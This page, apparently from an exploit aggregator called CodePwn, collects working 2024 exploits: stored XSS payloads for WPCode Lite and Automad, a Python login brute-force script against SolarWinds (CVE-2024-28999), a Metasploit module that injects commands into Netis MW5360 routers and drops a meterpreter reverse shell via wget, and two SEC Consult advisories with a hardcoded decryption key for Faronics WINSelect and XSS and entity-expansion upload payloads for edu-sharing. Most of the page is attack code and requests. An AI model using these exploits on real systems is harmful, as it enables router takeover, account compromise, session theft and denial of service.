Latest exploits :: CodePwn

<pre><code># Exploit Title: Wordpress WPCode Lite Version 2.1.14 Stored XSS # Date: 2024-06-30 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://wpcode.com/?utm_source=wprepo&utm_medium=link&utm_campaign=liteplugin # Version 2.1.14 ### Steps to Execute the Payload: 1. **Access the Admin Panel:** - Navigate to the admin panel of your WordPress site. - Go to `Code Snippets > `Edit Snippet` via the following URL: ``` https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 ``` 2. **Insert the Payload:** - In the **Code Preview** section, insert the following payload: ``` "><img src=x onerrora=confirm() onerror=confirm(document.cookie)> ``` 3. **Save and Verify:** - Active , Save the changes. - Navigate to the main page of your site: ``` https://127.0.0.1/ ``` - You should see the payload executed. Post Request : POST /wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 HTTP/2 Host: 127.0.0.1 Cookie: wordpress_sec_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C37619eff632d24400e28a219976a87efa83c4bae1ebe04120e54cb37dbe30a03; wordpress_logged_in_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C49992c3be16529995b5429fdd992a2dc1ff8cafa77c6f72580d9dbf9f3fe82ca; wp-settings-time-1=1719753966; WP-TSW-Session=5lursai747c2vcd5uno86liv2c; wp-settings-1=editor%3Dhtml User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 Content-Type: application/x-www-form-urlencoded Content-Length: 673 Origin: https://vagabondcreature.s3-tastewp.com Dnt: 1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers wpcode_active=&button=publish&wpcode_snippet_title=Untitled+Snippet&wpcode_snippet_type=html&wpcode_snippet_code=%22%3E%3Cimg+src%3Dx+onerrora%3Dconfirm%28%29+onerror%3Dconfirm%28document.cookie%29%3E&wpcode_snippet_text=%3Cp%3E%22%26gt%3B%3Cimg+src%3D%22x%22+%2F%3E%3C%2Fp%3E&wpcode_auto_insert=1&wpcode_auto_insert_location_extra=&wpcode_auto_insert_number=1&wpcode_auto_insert_location=site_wide_header&wpcode-schedule-start=&wpcode-schedule-end=&wpcode_cl_rules=%5B%5D&wpcode_tags=&wpcode_priority=10&wpcode_note=&id=10&wpcode-save-snippet-nonce=73d127c1c2&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwpcode-snippet-manager%26snippet_id%3D10%26message%3D1%26error </code></pre>

<pre><code># Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition # CVE: CVE-2024-28999 # Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions # Author: Elhussain Fathy, AKA 0xSphinx import requests import urllib3 import asyncio import aiohttp urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED') # host = '192.168.1.1' # username = "admin" # file_path = "passwords.txt" host = input("Enter the host: ") username = input("Enter the username: ") file_path = input("Enter the passwords file path: ") exploited = 0 url = f"https://{host}:443/Orion/Login.aspx?ReturnUrl=%2F" passwords = [] with open(file_path, 'r') as file: for line in file: word = line.strip() passwords.append(word) print(f"Number of tested passwords: {len(passwords)}") headers = { 'Host': host, } sessions = [] for _ in range(len(passwords)): response = requests.get(url, headers=headers, verify=False, stream=False) cookies = response.headers.get('Set-Cookie', '') session_id = cookies.split('ASP.NET_SessionId=')[1].split(';')[0] sessions.append(session_id) async def send_request(session, username, password): headers = { 'Host': host, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Cookie': f'ASP.NET_SessionId={session}; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE', } data = f'__EVENTTARGET=ctl00%24BodyContent%24LoginButton&__EVENTARGUMENT=&__VIEWSTATE=AEQKNijmHeR5jZhMrrXSjzPRqhTz%2BoTqkfNmc3EcMLtc%2FIjqS37FtvDMFn83yUTgHBJIlMRHwO0UVUVzwcg2cO%2B%2Fo2CEYGVzjB1Ume1UkrvCOFyR08HjFGUJOR4q9GX0fmhVTsvXxy7A2hH64m5FBZTL9dfXDZnQ1gUvFp%2BleWgLTRssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3%2F1uhWb8fFc8Mik%3D&__VIEWSTATEGENERATOR=01070692&ctl00%24BodyContent%24Username={username}&ctl00%24BodyContent%24Password={password}' async with aiohttp.ClientSession() as session: async with session.post(url, headers=headers, data=data, ssl=False, allow_redirects=False) as response: if response.status == 302: global exploited exploited = 1 print(f"Exploited Successfully Username: {username}, Password: {password}") async def main(): tasks = [] for i in range(len(passwords)): session = sessions[i] password = passwords[i] task = asyncio.create_task(send_request(session, username, password)) tasks.append(task) await asyncio.gather(*tasks) asyncio.run(main()) if(not exploited): print("Exploitation Failed") </code></pre>

<pre><code># Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS) # Date: 20-06-2024 # Exploit Author: Jerry Thomas (w3bn00b3r) # Vendor Homepage: https://automad.org # Software Link: https://github.com/marcantondahmen/automad # Category: Web Application [Flat File CMS] # Version: 2.0.0-alpha.4 # Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11 (bullseye) # Description A persistent (stored) cross-site scripting (XSS) vulnerability has been identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker to inject malicious JavaScript code into the template body. The injected code is stored within the flat file CMS and is executed in the browser of any user visiting the forum. This can result in session hijacking, data theft, and other malicious activities. # Proof-of-Concept *Step-1:* Login as Admin & Navigate to the endpoint http://localhost/dashboard/home *Step-2:* There will be a default Welcome page. You will find an option to edit it. *Step-3:* Navigate to Content tab or http://localhost/dashboard/page?url=%2F&section=text & edit the block named ***`Main`*** *Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)> *Request:* POST /_api/page/data HTTP/1.1 Host: localhost Content-Length: 1822 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv Accept: */* Origin: http://localhost Referer: http://localhost/dashboard/page?url=%2F&section=text Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb Connection: close ------WebKitFormBoundaryzHmXQBdtZsTYQYCv Content-Disposition: form-data; name="__csrf__" 49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1 ------WebKitFormBoundaryzHmXQBdtZsTYQYCv Content-Disposition: form-data; name="__json__" {"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing for xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS identified by Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2. <img src=x onerror=alert(1)> ","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"} ------WebKitFormBoundaryzHmXQBdtZsTYQYCv-- *Response:* HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Thu, 20 Jun 2024 19:17:35 GMT Content-Type: application/json; charset=utf-8 Connection: close X-Powered-By: PHP/8.3.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 30` {"code":200,"time":1718911055} *Step-5:* XSS triggers when you go to homepage - http://localhost/ </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240624-0 > ======================================================================= title: Multiple Vulnerabilities allowing complete bypass product: Faronics WINSelect (Standard + Enterprise) vulnerable version: <8.30.xx.903 fixed version: 8.30.xx.903 CVE number: CVE-2024-36495, CVE-2024-36496, CVE-2024-36497 impact: high homepage: https://www.faronics.com/products/winselect found: 2024-02-01 by: Daniel Hirschberger (Office Bochum) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "WINSelect - Allows you to easily control your end-users' Windows Experience without having to deal with GPOs. Need to Prevent Data From Leaving? Whether you're working on classified government files or the secret ingredient for your famous lasagna, you need to protect your sensitive information from walking out the door. Faronics WINSelect offers the ability to disable USB ports and disk drives. Now you can relax knowing your secrets won't be exported without your knowledge." Source: https://www.faronics.com/products/winselect Business recommendation: ------------------------ The vendor provides a patched version which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Read/Write Permissions for Everyone on Configuration File (CVE-2024-36495) The application saves its configuration in an encrypted file which "Everyone" has read and write access to. 2) Hardcoded Credentials (CVE-2024-36496) The configuration file is encrypted with a static key derived from a static five- character password which allows an attacker to decrypt this file. 3) Unhashed Storage of Password (CVE-2024-36497) The decrypted configuration file contains the password in cleartext which is used to configure WINSelect. It can be used to remove the existing restrictions and disable WINSelect entirely. By combining these issues any local attacker can disable WINSelect. Proof of concept: ----------------- 1) Read/Write Permissions for Everyone on Configuration File (CVE-2024-36495) WINSelect Standard saves its configuration in the following file: C:\ProgramData\WINSelect\WINSelect.wsd Every user has read and write permissions on this file by default: <read_write_everyone.png> The write permission is no problem as long as WINSelect is running, because it is locked by the process WSEngine.exe. For WINSelect Enterprise the path for the configuration file is: C:\ProgramData\Faronics\StorageSpace\WS\WINSelect.wsd 2) Hardcoded Credentials (CVE-2024-36496) By analyzing the application via the API Monitor tool, we found that the application uses a hardcoded five letter password, hashes it with the outdated and broken MD5 algorithm (no salt) and uses the first five bytes as the key for RC4. The configuration file is then encrypted with these parameters. After starting WINSelect.exe the MD5 and RC4 algorithms are requested: <rc4_md5.png> When the login to the configuration of WINSelect is triggered via CTRL+ALT+SHIFT+F8, the configuration file is decrypted. <login.png> The hardcoded password "Kunal" is hashed. <hash_input.png> <hash_output.png> The first five bytes of the hash are used to instantiate a key object. <key.png> The configuration is then decrypted with this key. <decrypted.jpeg> To simplify this proof of concept the following python script was developed which automatically decrypts an encrypted WINSelect.wsd: <test.py> 3) Unhashed Storage of Password (CVE-2024-36497) By decrypting the configuration file, the used password can be extracted at the beginning of the file: --- <?xml version="1.0"?> <KIOSK> <SECTIONS> <SECTION> <SID>194</SID> <RULES> <RULE> <ID>121</ID> <ENABLED>1</ENABLED> </RULE> <RULE> <ID>148</ID> <ENABLED>1</ENABLED> </RULE> <RULE> <ID>116</ID> <ENABLED>1</ENABLED> <DATA> <PASSWORDSET>0</PASSWORDSET> <ADMINPASSWORD>myadminpw</ADMINPASSWORD> </DATA> --- Vulnerable / tested versions: ----------------------------- The following version has been tested which was the latest version available at the time of the test: * 8.22.1112.886 Vendor contact timeline: ------------------------ 2024-02-19: Contacting vendor through support@faronics.com and customerservice@faronics.com 2024-02-20: Vendor responds with an email address to which we shall send the advisory. 2024-02-20: Asking for encryption, vendor requests unencrypted communication, submitting advisory. 2024-02-21: Vendor confirms receipt, engaged with product and development teams. 2024-02-27: Vendor introduces additional contact, will coordinate further responses. 2024-03-13: Additional contact apologizes for delayed response, vulnerabilities already discussed internally. Asks for extension of release. 2024-03-14: Extending advisory release to coordinate with patch. 2024-04-10: Vendor has addressed the reported issues in a test build for the standard version, enterprise fixes will be incorporated soon. 2024-04-18: Giving feedback that the issue is still exploitable, proposing a better hash function and random UUID, linking to OWASP password storage cheat sheet. 2024-04-21: Vendor thanks us for the proposed fix, current patch must be released, but working on new version incorporating our feedback. 2024-04-23: Providing further feedback, especially regarding GPU attacks. 2024-05-27: Asking for a status update. 2024-05-29: Vendor's last email got stuck in their mailbox. The latest WINSelect patch was released in early May, now incorporates PBKDF2. Provides release notes and download URL. Reserving CVE numbers. 2024-06-10: We can confirm that the PBKDF2 is used with SHA256 and 600000 iterations 2024-06-11: Since the hardcoded password for the encryption is not fixed, we ask if this will be addressed as well. Vendor responds that this will be addressed in a future release. 2024-06-24: Coordinated release of security advisory. Solution: --------- The vendor provides a patched version 8.30.xx.903 since May 2024 which can be downloaded from the following URL: https://www.faronics.com/document-library/document/download-winselect-standard The vendor provided the following changelog: https://www.faronics.com/en-uk/document-library/document/winselect-standard-release-notes Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Daniel Hirschberger / @2024 </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Netis router MW5360 unauthenticated RCE.', 'Description' => %q{ Netis router MW5360 has a command injection vulnerability via the password parameter on the login page. The vulnerability stems from improper handling of the "password" parameter within the router's web interface. The router's login page authorization can be bypassed by simply deleting the authorization header, leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable. Attackers can inject a command in the 'password' parameter, encoded in base64, to exploit the command injection vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker to take control of the router. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor 'Adhikara13' # Discovery of the vulnerability ], 'References' => [ ['CVE', '2024-22729'], ['URL', 'https://attackerkb.com/topics/MvCphsf4LN/cve-2024-22729'], ['URL', 'https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md'] ], 'DisclosureDate' => '2024-01-11', 'Platform' => ['linux'], 'Arch' => [ARCH_MIPSLE], 'Privileged' => true, 'Targets' => [ [ 'Linux Dropper', { 'Platform' => ['linux'], 'Arch' => [ARCH_MIPSLE], 'Type' => :linux_dropper, 'CmdStagerFlavor' => ['wget'], 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'SSL' => false, 'RPORT' => 80 }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('TARGETURI', [ true, 'The Netis MW5360 router endpoint URL', '/' ]), OptInt.new('CMD_DELAY', [true, 'Delay in seconds between payload commands to avoid locking', 30]) ]) end def execute_command(cmd, _opts = {}) # cleanup payload file when session is established. if cmd.include?('chmod +x') register_files_for_cleanup(cmd.split('+x')[1].strip) end # skip last command to remove payload because it does not work unless cmd.include?('rm -f') payload = Base64.strict_encode64("`#{cmd}`") print_status("Executing #{cmd}") send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'), 'vars_post' => { 'password' => payload, 'quick_set' => 'ap', 'app' => 'wan_set_shortcut' } }) end end def check print_status("Checking if #{peer} can be exploited.") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_get.cgi'), 'vars_post' => { 'mode_name' => 'skk_get', 'wl_link' => 0 } }) return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('version') # trying to get the model and version number # unfortunately JSON parsing fails, so we need to use this ugly REGEX :-( version = res.body.match(/.?(version).?\s*:\s*.?((\\|[^,])*)/) # when found, remove whitespaces and make all uppercase to avoid suprises in string splitting and comparison unless version.nil? version_number = version[2].upcase.split('-V')[1].gsub(/[[:space:]]/, '').chop # The model number part is usually something like Netis(NC63), but occassionally you see things like Stonet-N3D if version[2].upcase.split('-V')[0].include?('-') model_number = version[2].upcase.split('-V')[0][/-([^-]+)/, 1].gsub(/[[:space:]]/, '') else model_number = version[2].upcase.split('-V')[0][/\(([^)]+)/, 1].gsub(/[[:space:]]/, '') end # Check if target is model MW5360 and running firmware 1.0.1.3442 (newest release 2024-04-24) or lower if version_number && model_number == 'MW5360' && (Rex::Version.new(version_number) <= Rex::Version.new('1.0.1.3442')) return CheckCode::Appears(version[2].chop.to_s) end return CheckCode::Safe(version[2].chop.to_s) end CheckCode::Safe end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :linux_dropper # Don't check the response here since the server won't respond # if the payload is successfully executed execute_cmdstager(noconcat: true, delay: datastore['CMD_DELAY']) end end end </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240620-0 > ======================================================================= title: Arbitrary File Upload product: edu-sharing (metaVentis GmbH) vulnerable versions: <8.0.8-RC2, <8.1.4-RC0, <9.0.0-RC19 fixed versions: >=8.0.8-RC2, >=8.1.4-RC0, >=9.0.0-RC19 CVE number: CVE-2024-28147 impact: high homepage: https://edu-sharing.com found: 2024-04-04 by: Kai Zimmermann (Office Frankfurt) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "edu-sharing software enables you to network your learning platforms and other educational software. Share learning content, metadata and tools - make them available in an educational cloud and let your users use them in all connected systems." Source: https://edu-sharing.com Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Arbitrary File Upload (CVE-2024-28147) An authenticated user can upload arbitrary files in the upload function for collection preview images. An attacker may upload an HTML file that includes malicious JavaScript code which will be executed if a user visits the direct URL of the collection preview image (Stored Cross Site Scripting). It is also possible to upload SVG files that include nested XML entities. Those are parsed when a user visits the direct URL of the collection preview image, which may be utilized for a Denial of Service attack. Proof of concept: ----------------- 1) Arbitrary File Upload (CVE-2024-28147) An authenticated user can update the preview image of an existing collection by sending the following request: -------------------------------------------------------------------------------- POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=image%2Fpng HTTP/1.1 Host: $SERVER Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID Content-Type: multipart/form-data; boundary=---------------------------159605426213527963452762824885 Content-Length: 288 -----------------------------159605426213527963452762824885 Content-Disposition: form-data; name="file"; PNG [...] -----------------------------159605426213527963452762824885-- -------------------------------------------------------------------------------- The URL parameter "mimetype" can be modified to match any uploaded file. The value is directly used in the server's "Content-Type" header. Both, the Content-Type request header and the filename parameter in the Content-Disposition request header do not need to be included in the data boundary inside the request in order to be sent successfully and can therefore be removed. The preview image can then be accessed by visiting the following URL: https://$SERVER/edu-sharing/preview?nodeId=$COLLECTIONID a. Stored Cross Site Scripting (HTML Upload) The initial request can be modified to include an HTML file, while keeping the magic bytes of a PNG image file. The "mimetype" parameter is changed to "text/html": -------------------------------------------------------------------------------- POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=text/html HTTP/1.1 Host: $SERVER Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID Content-Type: multipart/form-data; boundary=---------------------------159605426213527963452762824885 Content-Length: 288 -----------------------------159605426213527963452762824885 Content-Disposition: form-data; name="file"; PNG <!DOCTYPE html> <html> <body> <h1>Test</h1> <script>alert(window.location)</script> </body> </html> -----------------------------159605426213527963452762824885-- -------------------------------------------------------------------------------- Visiting the preview URL as seen in figure 1 below shows that the JavaScript code is executed: [01_stored_xss.png] b. Denial of Service (SVG Upload) The initial request can be modified to upload an SVG file containing nested XML entities. The "mimetype" parameter is changed to "image%2Fsvg": -------------------------------------------------------------------------------- POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=image%2Fsvg HTTP/1.1 Host: $SERVER Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID Content-Type: multipart/form-data; boundary=---------------------------29539943986372261721095197803 Content-Length: 581 -----------------------------29539943986372261721095197803 Content-Disposition: form-data; name="file"; <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY bar "Text "><!ENTITY t1 "&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;"><!ENTITY t2 "&t1;&t1;&t1;&t1;">]> <svg xmlns="http://www.w3.org/2000/svg"> <data>&t2;</data> </svg> -----------------------------29539943986372261721095197803-- -------------------------------------------------------------------------------- Visiting the preview URL as seen in figure 2 below shows that the XML code is parsed: [02_denial_of_service] Vulnerable / tested versions: ----------------------------- The following version has been tested which was the latest version available at the time of the test: * 9.0 (pre-release) The vendor confirmed that previous versions (8.0 and 8.1) are affected as well. Vendor contact timeline: ------------------------ 2024-04-10: Contacting vendor through security@edu-sharing.com 2024-04-11: Vendor replied and confirmed security contact. Advisory information has been sent to vendor. 2024-04-12: Vendor confirmed receiving the advisory and is now trying to reproduce the described behavior. 2024-05-03: Reminder sent to security@edu-sharing.com, asking for an update on fixing the vulnerability. 2024-05-07: Vendor provides affected versions. Fixes have already been implemented and published. Vendor is requesting to wait with the public advisory release in order to allow affected customers to perform the next rollout. 2024-05-07: Vendor provides fixed versions. Public advisory release scheduled for 2024-06-04. 2024-05-15: Public advisory release postponed to 2024-06-20. 2024-06-20: Coordinated release of advisory. Solution: --------- The repository base version in use can be identified in the Admin-Tools. The vendor provides a patch for the affected versions: * Version 8.0: Update repository version to "8.0.8-RC2" or later * Version 8.1: Update repository version to "8.1.4-RC0" or later * Version 9.0: Update repository version to "9.0.0-RC19" or later Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Kai Zimmermann / 2024 </code></pre>